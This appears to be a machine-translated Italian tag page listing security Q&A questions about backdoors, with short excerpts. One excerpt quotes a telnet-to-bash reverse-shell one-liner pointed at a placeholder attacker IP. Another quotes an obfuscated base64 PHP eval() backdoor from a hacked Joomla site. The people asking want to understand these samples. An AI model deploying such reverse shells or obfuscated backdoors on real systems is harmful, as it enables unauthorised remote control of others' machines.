Domande con tag 'backdoor'

1
risposta

Porta posteriore a guscio inverso

Perché questo esempio di backdoor della shell inversa richiede due ascoltatori? Il listener utilizza il comando nc (nc -l). telnet <attacker_ip> <port_a> | /bin/bash | telnet <attacker_ip> <port_b> Anche se l'esempio...
posta 31.10.2014 - 08:57
2
risposte

Ottenere l'accesso root su Ubuntu 14.04 [chiuso]

Sto prendendo una classe di Computer Security e dovrei indurire il mio sistema molto bene, ma dovrei lasciare una "backdoor" per consentire all'avversario di ottenere l'accesso come root. Ho cercato di capire qualcosa per due giorni e, dato c...
posta 30.03.2015 - 22:48
1
risposta

Le back back possono essere ragionevolmente ben nascoste nella comunicazione cifrata end-to-end?

Supponendo che i governi possano tenere segreti e non esistano dipendenti fuorilegge, una porta sul retro in un protocollo di comunicazione end-to-end può essere tenuta segreta e non essere sfruttata dai criminali, come spesso si suppone? Que...
posta 28.10.2017 - 11:59
2
risposte

Reset automatico dell'indirizzo IP DNS

Ho un Windows non ufficiale e ho notato che la mia connessione Internet viene ripristinata. Dando un'occhiata più da vicino, ho trovato che l'indirizzo del server DNS è impostato su un IP in Cina. Qualche ragione per cui questo non sarebbe il se...
posta 08.11.2015 - 13:39
0
risposte

Backdooring lighttpd vulnerabile installato su AP wireless [chiuso]

Ho un AP a casa e sto cercando di assicurarlo il più possibile. Ho trovato un bug per caso. Il mio AP ha 3 porte aperte: 22 / ssh 53 / dns 8081 / blackice - icecap Quello che ho scoperto è che la mia porta 8081 sta eseguendo il softwa...
posta 03.11.2014 - 18:01
5
risposte

Sito backdoor & eval ()

Gestisco un sito Joomla 1.7 che è stato hackerato oggi. Sotto lo script ha fatto il trucco. eval((base64_decode("DQoNCnByaW50IEBmaWxlX2dldF9jb250ZW50cygnaHR0cDovLzkzLjExNS44Ni4xNjgvaGxpbmtzL2xpbmtzLnBocD91YT0nIC4gQHVybGVuY29kZSgkX1NFUlZFUlsnSF...
posta 21.02.2013 - 10:54
3
risposte

Qual è la differenza tra una backdoor e un rootkit?

Stavo leggendo il "Che cos'è un rootkit? " post e sono confuso circa la differenza tra un rootkit e una backdoor. Come ho capito, entrambi: Sono un pezzo di codice scritto dall'hacker e iniettato in un sistema Consenti l'accesso al sis...
posta 01.06.2017 - 10:07
2
risposte

Come dovrebbe essere consegnata una backdoor? [chiuso]

Mi chiedo come possa essere consegnata una backdoor a qualcuno e i vantaggi e gli svantaggi dei vari modi. Come backdoor, intendo uno script o un payload che può essere in grado di ottenere una connessione tcp / http inversa a un server in mo...
posta 20.03.2017 - 01:26
2
risposte

Software di crittografia affidabile?

Se stai scaricando e utilizzando un software di crittografia, e. g. Veracrypt o Diskcryptor, come fai a sapere se questo software non è falso? Backdoor o altri buchi di sicurezza? Supponendo che tali programmi non siano codificati entro un piovo...
posta 15.10.2015 - 12:42
1
risposta

Perché i produttori di dispositivi costruiscono backdoor quando possono distruggere la reputazione dell'azienda? [chiuso]

Come afferma il titolo: Perché le grandi aziende come gli sviluppatori di router costruiscono intenzionalmente backdoor nei loro prodotti quando possono distruggere completamente la reputazione dell'azienda e causare un grave rischio per la sicu...
posta 09.03.2015 - 10:14